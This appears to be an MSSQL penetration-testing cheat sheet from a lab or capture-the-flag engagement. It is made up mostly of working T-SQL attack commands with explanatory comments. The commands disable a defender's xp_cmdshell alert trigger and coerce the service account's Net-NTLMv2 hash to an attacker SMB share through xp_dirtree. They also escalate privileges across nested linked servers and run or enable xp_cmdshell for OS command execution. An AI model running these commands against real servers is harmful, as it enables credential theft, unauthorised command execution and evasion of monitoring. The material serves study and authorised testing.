MSSQL


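-- NOTE: T-SQL comments are "--" or /* */. The "#" used in the original notes
-- is not a comment delimiter and makes every line a syntax error when pasted
-- into sqlcmd / SSMS / mssqlclient.

-- Server version. The build number tells you the patch level and which
-- xp_*/CLR tricks below are likely to work.
SELECT @@VERSION;

-- Name of the instance we are connected to (useful to tell hops apart later
-- when walking linked servers).
SELECT @@SERVERNAME;

-- Login we are running as at the server level. USER_NAME() would instead give
-- the database user, which is often different (e.g. dbo vs. a low-priv login).
SELECT SUSER_NAME();

-- All logins. master..syslogins is a compatibility view kept since SQL 2005;
-- sys.server_principals is the modern equivalent if this one is unavailable.
SELECT name FROM master..syslogins;

-- Which logins hold the sysadmin fixed server role (sysadmin is a bit column,
-- so compare against an int, not the string '1').
SELECT name, sysadmin FROM master..syslogins;
SELECT name FROM master..syslogins WHERE sysadmin = 1;

-- Databases visible to this login (only those we have some access to appear).
SELECT name FROM master..sysdatabases;

-- Our own effective server-level permissions. An empty result set means no
-- server-scoped rights at all; look for CONTROL SERVER, IMPERSONATE, ALTER ANY LOGIN.
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

-- Tables and schemas in a given database. "flag" is the database name from
-- this engagement; substitute the target DB.
SELECT table_name, table_schema FROM flag.INFORMATION_SCHEMA.TABLES;

-- Cross-database (and cross-linked-server) addressing is four-part:
-- [server].[db].[schema].[table].

-- Server-scoped DDL/logon triggers. A defender may have one that fires on
-- xp_cmdshell use or on login and kills the session / alerts. Disabling a
-- server-scoped trigger needs CONTROL SERVER (sysadmin in practice) and is
-- itself a loud, logged action -- enumerate first, disable only if you must.
SELECT name FROM sys.server_triggers;
DISABLE TRIGGER ALERT_xp_cmdshell ON ALL SERVER;

-- If xp_dirtree is reachable (it is usually executable by any login), make the
-- SQL Server service account connect to our SMB share and capture its
-- Net-NTLMv2 with Responder / ntlmrelayx. Start the listener first. The UNC
-- path must be passed as a quoted string literal or the call fails to parse.
EXEC master..xp_dirtree '\\10.10.16.7\test';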
  • Database links (linked servers)

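-- Linked servers configured on this instance. The login mapping of each link
-- decides whose identity our queries arrive as on the remote side; a link that
-- maps us to a remote sysadmin is a privilege-escalation path. dataaccess must
-- be 1 for OPENQUERY, rpcout must be 1 for EXECUTE ... AT.
SELECT srvname, srvproduct, providername, datasource, dataaccess, rpcout
FROM master..sysservers;
-- Modern equivalent: SELECT name, data_source, is_data_access_enabled,
-- is_rpc_out_enabled FROM sys.servers;

-- Everything below runs on the REMOTE server, as the login the link maps us
-- to, not as our own login. Double-quoted link names rely on
-- SET QUOTED_IDENTIFIER ON (the default in SSMS/sqlcmd); [COMPATIBILITY\POO_CONFIG]
-- works regardless of that setting.

-- Remote instance name (confirms which box the link actually points to).
SELECT * FROM OPENQUERY("COMPATIBILITY\POO_CONFIG", 'SELECT @@SERVERNAME');

-- Remote version.
SELECT * FROM OPENQUERY("COMPATIBILITY\POO_CONFIG", 'SELECT @@VERSION');

-- Remote logins and their sysadmin flag. Also check who WE are over there
-- with 'SELECT SUSER_NAME()' before assuming any of these rights apply to us.
SELECT * FROM OPENQUERY("COMPATIBILITY\POO_CONFIG", 'SELECT name, sysadmin FROM master..syslogins');

-- Databases on a second link.
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name FROM master..sysdatabases;');

-- Tables in a specific remote database (three-part name inside the remote query).
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT table_schema, table_name, table_type FROM clients.information_schema.tables');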
  • nested database links

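-- Nested links: hop A -> B -> C. Each nesting level doubles every single quote
-- inside the string, so a literal 'SERVER' at depth two is written ''''SERVER''''.
-- The identity at each hop is the mapping of the link used to reach it; a
-- link back to the origin server (POO_PUBLIC here) is a common way to come
-- back as a more privileged login than the one you started with.

-- Who are we on POO_PUBLIC when we arrive via POO_CONFIG?
SELECT * FROM OPENQUERY("COMPATIBILITY\POO_CONFIG",
    'SELECT * FROM OPENQUERY("COMPATIBILITY\POO_PUBLIC", ''SELECT SUSER_NAME();'')');

-- Server-level permissions of that mapped login on the final hop.
SELECT * FROM OPENQUERY("COMPATIBILITY\POO_CONFIG",
    'SELECT * FROM OPENQUERY("COMPATIBILITY\POO_PUBLIC", ''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'')');

-- OS command execution on the final hop. EXECUTE ... AT needs "RPC Out"
-- enabled on each link in the chain, and xp_cmdshell must be enabled on the
-- target; it runs as the SQL Server service account of that instance.
EXECUTE('EXECUTE(''xp_cmdshell whoami'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG];

-- If the call above fails with "xp_cmdshell is disabled" and the mapped login
-- is sysadmin there, it can be switched on through the same chain (loud: this
-- changes server configuration and is commonly alerted on):
-- EXECUTE('EXECUTE(''sp_configure ''''show advanced options'''', 1; RECONFIGURE; sp_configure ''''xp_cmdshell'''', 1; RECONFIGURE;'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG];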
  • Stored procedures and CLR assemblies

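-- Stored procedures in the remote database. Procedures that run under
-- EXECUTE AS OWNER, are signed, or shell out are the interesting ones.
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, object_id FROM clients.sys.procedures');

-- Do we (as the link's mapped login) have VIEW DEFINITION on a given
-- procedure? 1 = yes, 0 = no. Without it the definition below comes back NULL
-- even when the procedure is not encrypted.
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT HAS_PERMS_BY_NAME(''clients.dbo.BackupClients'', ''OBJECT'', ''VIEW DEFINITION'') AS CanViewDefinition');

-- Procedure source. OBJECT_DEFINITION()/OBJECT_NAME() resolve object_ids in
-- the remote connection's CURRENT database, which is the mapped login's
-- default DB and not necessarily "clients" -- so they can silently return NULL
-- for a perfectly readable procedure. Reading sys.sql_modules with a
-- three-part name avoids that. definition IS NULL here means either the
-- procedure was created WITH ENCRYPTION or we lack VIEW DEFINITION (check the
-- previous query to tell the two apart).
SELECT * FROM OPENQUERY("WEB\CLIENTS",
    'SELECT p.name AS ProcName, m.definition AS Definition
     FROM clients.sys.procedures AS p
     LEFT JOIN clients.sys.sql_modules AS m ON m.object_id = p.object_id
     WHERE p.name = ''BackupClients''');

-- User CLR assemblies loaded in the database. permission_set_desc of
-- UNSAFE_ACCESS (or EXTERNAL_ACCESS) means the assembly can run arbitrary
-- native/OS code; whether it can actually execute also depends on the
-- instance-level "clr enabled" and, on 2017+, "clr strict security" settings.
-- is_visible = 0 is a helper assembly that is not directly callable.
SELECT * FROM OPENQUERY("WEB\CLIENTS", 'SELECT name, assembly_id, clr_name, permission_set_desc, is_visible, create_date, modify_date FROM clients.sys.assemblies');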
